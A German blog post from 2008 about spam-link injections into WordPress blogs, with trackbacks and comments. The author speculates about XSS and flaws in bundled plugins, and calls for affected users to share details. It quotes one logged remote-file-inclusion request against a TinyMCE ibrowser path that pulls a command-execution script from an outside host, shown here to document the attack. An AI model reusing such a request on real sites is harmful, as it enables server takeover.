Blog-Hack III
25. März 2008Derzeit tauchen fast täglich neue Blogs auf deren Beiträge mit Spam-Links verseucht wurden. Zuletzt las ich in einem Kommentar von Fellow Passenger das sein Blog auch betroffen war, abonnierte den Feed und sah das es schon wieder betroffen ist. Oder der Müll wurde zwischenzeitlich erst gar nicht weg geräumt.
Da haben die Cracker und Spammer wohl eine wirklich (für sie) effektive Sicherheitslücke aufgetan. Ich vermute stark das es ein XSS-Angriff ist, im Moment bekomme ich ständig irgendwelche Links die HTML-Code mit IFrames enthalten. Zuerst waren es Referrer, jetzt sind es auch 6 Spamkommentare. Mal abwarten wann die ersten Trackbacks eintrudeln.
Bestärkt wurde ich durch einen Beitrag in BlogSecurity. Dort wird von einer XSS-Lücke gesprochen, allerdings soll sie angeblich nur die WP-version 2.3.2 betreffen und dann auch nur die bei wordpress.com gehosteten Blogs.
Leider lässt sich nur schwer sagen welche WP-Versionen betroffen sind. Bis jetzt waren wohl Blogs mit den WP-Versionen 2.2.x und 2.3.x. Das muss aber nichts bedeuten, u.U. sind dies nur die derzeit am weitesten verbreiteten Versionen. Also eher Zufall das ausgerechnet diese Versionen betroffen sind.
Denkbar wäre auch das ein Plugin, welches standardmäßig mit WP ausgeliefert wird, den Fehler enthält. Bei Plugin denke ich nun nicht nur an die Plugins die man für WP nachinstallieren kann, sondern auch die, die von Hause aus dabei sind. Ob nun TinyMCE oder die JavaScript-Frameworks jQuery und scriptacolous. Auf diese Idee bin ich gekommen als ich ein wenig in der Server-Logs gestöbert habe. Dabei ist mir ein Aufruf aufgefallen der direkt auf das Verzeichnis mit TinyMCE gerichtet war.
GET /interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://claroline.lct-net.cl/id?
Folgt man dem Link in dieser Anfrage, erscheint ein PHP-Script welches auf verschiedene Arten versucht einen Befehl auszuführen. Das ganze scheint mir eher eine fehlgeleitete Attacke gewesen zu sein, schließlich wurde ein TinyMCE-Plugin angegriffen welches es ermöglicht im Backend Bilder hochzuladen. Weder ist der Pfad korrekt noch habe ich ein solches Plugin installiert. Der Versuch zeigt aber das WordPress auch an anderen Stellen verwundbar ist als nur in den Core-Dateien oder den Plugins.
Derzeit bin ich selber etwas ratlos was man noch machen könnte oder wo man noch suchen sollte. Es ist mir zwar gelungen die XSS-Angriffe mittels IFrame zu simulieren, die würden aber nur ganz bestimmte Plugins betreffen. Es ist wohl eher unwahrscheinlich das alle Blogger Semmelstatz installiert haben und dann auch noch mit einem Browser surfen, der XSS-Angriffe nicht unterbindet.
Meiner Meinung nach wäre es im Moment ganz wichtig ein paar Informationen zu sammeln. Welche Blogs sind oder waren betroffen, welche WP-Version, welche Plugins, usw. Vielleicht wird es dann etwas klarer wie die Spammer es schaffen ihren Müll in den Beiträgen abzuladen. Auf Ja gut, aber… habe ich vorgeschlagen das sich die Betroffenen ggf. im WordPress-Forum mal versammeln und ein paar Infos austauschen.
Noch bin ich selber nicht betroffen. Aber ich habe irgendwie auch keine Lust mich in die Reihe der Betroffenen einzureihen. Deswegen wäre es mir ganz lieb wenn man mal einen Überblick bekommen könnte, denn von WordPress scheint derzeit nicht viel zu kommen.
[...] tja, Wordpress mag eins der Blog-Tools sein, die weltweit mit am beliebtesten sind, zugleich schießen sich Spammer und Hacker vermehrt drauf ein. Kann mich nicht erinnern, dass ich 2006 in der deutschen Blogosphäre ein Blog gehaked worden ist, 2007 war es dann soweit. Und 2008 scheint es sich zu häufen. Was nun einige Blogger zum Anlass nehmen, sich der Sache genauer anzunehmen: - Unser täglich Spam: Aktuelle Angriffe auf WordPress-Blogs (mit vielen Tipps) - Tom’s Diner: Blog-Hack III (schlägt vor, im Wordpress-Forum die Lücken zusammenzutzragen) - Webrocker: Wordpress Hackereien - Ein Blick auf BlogSecurity kann nie schaden [...]
Ich habe mal ein entsprehendes Posting im “>WP-Forum getätigt.
Ein entsprechender Thread existiert inzwischen: Gemeinsamkeiten zwischen geknackten WP-Blogs.
Bei meinem liebevoll handkodierten Link ist wohl etwas schiefgegangen. Deswegen hier nochmal der Thread im Wordpress-Forum.
Hackangriffe auf Wordpress-Blogs…
Derzeit scheint es ein Sicherheitsproblem auch in der neusten Wordpress-Version zu geben, dass es erlaubt unbemerkt Spamlinks in Artikeln unterzubringen. Entsprechende Berichte finden sich hier, hier oder auch hier und hier.
Der Spam sorgt zudem daf…
[...] In den letzten Tagen wird ja wieder einmal viel über die Sicherheit bzw. Unsicherheit von WordPress gesprochen. In erster Linie wird WordPress beschimpft wie schlecht und unsicher es doch ist. Das ist teilweise sogar unbestritten, ich will jedoch nicht weiter darauf eingehen. Wie so oft fehlt es bisher an praktischen Lösungsansätzen. Gar nicht mal so sehr wenn’s darum geht das eigene Blog abzusichern - dafür finden sich genügend Tipps - eher aber wenn’s darum geht nach Eindringlingen zu suchen und zu prüfen ob man selbst betroffen ist. [...]
Ich nutze derzeit das Plugin Bot-Tracker, welches u.a. Hackangriffe nicht nur protokolliert, sondern auch noch u.U. sperrt!
Es ist zwar ein Tracker für Bots, aber wenn es hilft…..
Achja, es ist ein Wordpress-Plugin!
Es gibt aber auch eine xterne Version dieses Tools unter http://www.crawltrack.fr/
[...] In den letzten Tagen wird ja wieder einmal viel über die Sicherheit bzw. Unsicherheit von WordPress gesprochen. In erster Linie wird WordPress beschimpft wie schlecht und unsicher es doch ist. Das ist teilweise sogar unbestritten, ich will jedoch nicht weiter darauf eingehen. Wie so oft fehlt es bisher an praktischen Lösungsansätzen. Gar nicht mal so sehr wenn’s darum geht das eigene Blog abzusichern - dafür finden sich genügend Tipps - eher aber wenn’s darum geht nach Eindringlingen zu suchen und zu prüfen ob man selbst betroffen ist. [...]